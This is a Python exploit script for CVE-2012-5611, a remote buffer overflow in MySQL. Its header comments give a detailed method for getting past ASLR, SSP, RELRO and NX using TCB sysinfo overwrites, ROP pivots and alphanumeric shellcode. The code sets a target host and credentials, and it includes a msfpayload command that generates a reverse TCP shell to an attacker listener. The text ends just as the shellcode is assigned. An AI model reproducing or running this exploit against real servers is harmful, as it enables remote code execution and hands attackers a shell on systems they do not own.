No description provided by source.
#!/usr/bin/env python
# 27/12/12 - status : public release
# CVE-2012-5611 ( https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5611 )
# -------- Author : ipv
# -------- Impact : high
# -------- URL : http://blog.ring0.me/
# -------- Description
#
# The code below is linked to CVE-2012-5611, a flaw discovered by kingcope.
# MySQL server is prone to a remote buffer overflow that
# allow remote authenticated attacker to reach code execution in the
# context of the user running MySQL instance (default: mysql user).
# The vulnerability resides in acl_get function, called when authenticated
# user requests a privileged Account Managment statement. MySQL fails
# to verify user controlled data len of "db" parameter.
#
# end=strmov((tmp_db=strmov(strmov(key, ip ? ip : "")+1,user)+1),db);
#
# The destination address of strcpy is located on a mmaped page dedicated to
# user connection which allow a buffer overflow on adjacent memory.
#
# Differents attacks vector may be possiblea according the system.
# FYI Microsoft Windows versions are as well vulnerables.
#---------------------------------------------------------
# To bypass ASLR/SSP/RELRO/NX:
#------------------------------------------------------------------------------
# I take profit of Threading-Model. This means MySQL use only one address
# space for all MySQL ressources (data structures, network managment,
# session, etc.).
# To bypass SSP, i overwrite sysinfo handler(pointing to sysenter vdso) of
# TCB structure located more higher on the stack.
# ROP chains aims to pivot to our controlled stack data. At this point,
# if we overwrite sysinfo handler, we cannot use ret2libc and/or GOT
# deferencing technique since libc API relies on the sysinfo pointer
# to call sysenter.
#
# So to accomplish code exec, afaik, you have two way :
# 1 - Extract sysinfo of an intact TCB and use it as proxy call
# (or you can restore the first sysinfo after doing modification on got)
# -> i use it for redhat exploit (no SSP on redhat/centos);
# -> this allow us to bypass relro/alsr/nx
# relro.
# 2 - Find a int0x80 / sysenter gadget in .text ;
# (Bad instruction follow int0x80 gadget, you have a one shooter to get
# code exec). So, i advise you to find a sysenter)
# - i use sysenter for ubuntu 10.04 self-compiled with SSP.
# - this allow us bypass relro/ssp/alsr/nx
#
# Shellcodes are alphanum-mixed (skylined tool ftw). Exploit bypass
# SSP/ASLR/NX.
#
#---------------------------------------------------------
# UTF-8 and ROP chains limitation :
#---------------------------------------------------------
# Mysql Schema Object Name restricts database name to be alpha numeric
# (and $ _).
# To bypass it, i use utf-8 encoding with byte lower than 0x80. Encoding is
# done via MySQL when databasename is quoted with `` (mandatory to
# successful exploit target). Yes the devil is in the details.
# MySQL reference : https://dev.mysql.com/doc/refman/5.1/en/identifiers.html
#
# For any comments/job offer, mail me : ipv _at_ consortium-of-pwners . net
########################################################################
# Modules
#
import pymysql
import sys
import struct
import os, socket
########################################################################
# Authentication options
#
MYSQL_USER = "test"
MYSQL_PASSWORD = ""
#MYSQL_HOST = "192.168.130.147"
MYSQL_HOST = "192.168.130.129"
MYSQL_PORT = 3306
########################################################################
# Helper
#
def _x(v):
if isinstance(v, str):
return v
return struct.pack("<I", v)
# TCP is used when we face to SSP
class _TCB:
tcb = 0 # updated later by a ret gadget
dtv = "BBBB"
_self = "CCCC"
multiple_threads= "DDDD"
sysinfo = 0 # SEIP - updated later by stack pivot gadget
stack_guard = "AAAA"
pointer_guard = 0 # updated later by a pop pop ret gadget
# base class
class rc_base:
eip_off = 0
align_payload = 0
align_stack = 2048
retsled = ""
safe_overwrite = ""
pivot = ""
pppr = ""
ppr = ""
# ./msf/msfpayload linux/x86/shell_reverse_tcp2 LHOST=192.168.130.1 LPORT=4444 R | ./alpha2 esp
# XXX - CHANGEME !
sc_rev_tcp =